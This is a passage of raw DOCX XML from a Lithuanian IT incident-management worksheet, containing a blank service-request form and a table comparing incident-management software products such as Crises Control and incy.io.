        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="006E411A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Reagavimo į incidentą schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D4631" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232"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4FBA9047" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B843243" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PASLAUGŲ UŽKLAUSOS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519A403C" w14:textId="340B4355" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232"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O PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="00185B38" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00185B38" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259F28F2" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Anketa:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4955"/>
        <w:gridCol w:w="4956"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="75F5689F" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65F29C03"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2757FF99"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Užpildyti</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="56FEEA95" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62BB8602"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Pildančio asmens Vardas, Pavardė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F10EA72"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="74ADD7D2" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C7A47CC"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Darbo vietos ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A2125A4"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="27515997" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C3D8BEC"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Reikalingas porikis, paslauga, resursas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="702DC7A8"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="41C825C6" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76E6BC83"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Laiko intervalas (valandomis, dienomis, nuolatinis)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CDAD272"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6EE2AD26" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="365DE5E9"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Pildomo poreikio pagrindas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B49F256"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F74232" w:rsidRPr="005A5C28" w14:paraId="509A274E" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="091977D4"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sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Tiesioginio vadovo vardas, pavardė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3116BE95" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44E2B89F" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0A7E74" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> INCIDENTŲ VALDYMO PROGRAMINĖ ĮRANGA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F356CE" w14:textId="693786D3" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232"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O PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="00185B38" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00185B38" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE1A9B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="927"/>
        <w:gridCol w:w="3604"/>
        <w:gridCol w:w="2327"/>
        <w:gridCol w:w="1596"/>
        <w:gridCol w:w="1457"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0D914185" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="927" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39560669" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Eil.Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3604" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3440C15D" w14:textId="7148CBA3" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00C94383" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Programinės įrangos pavadinimas</w:t>
            </w:r>
            <w:r w:rsidR="00F74232" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>: versija / namų puslapio adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3346D0BF" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Pagrindiniai privalumai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1596" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EC2FF8F" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Pagrindiniai trūkumai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1457" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59D2F86D" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Kaina, siūlomas planas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0F782D51" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="188B4F94" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3378A673" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Crises Control</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="369660C5" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>http://www.crises-control.com/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="420B3AFC" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Sumažinti atsakymo laiką</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43E2B215" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Kelių kanalų pranešimai</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AD6B5FB" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Daugiakalbiai </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>pranešimai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1596" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A103CAB" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Nelaimės atkūrimas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BF447E8" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>IT incidentų valdymo agentas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15777CAE" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tyrimų valdymas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="501CEEAD" w14:textId="3FEEAB81" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>OSHA atitiktis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1457" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00FD4622" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Nemokama versija</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="44FBF8CD" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="106F414A" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17287017" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>incy.io</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0560E708" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>https://www.planbrothers.io/products/incy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="718BD05E" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paprasta naudoti visiems</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BC5A006" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Stebėjimas ir stebėjimas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0798B769" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
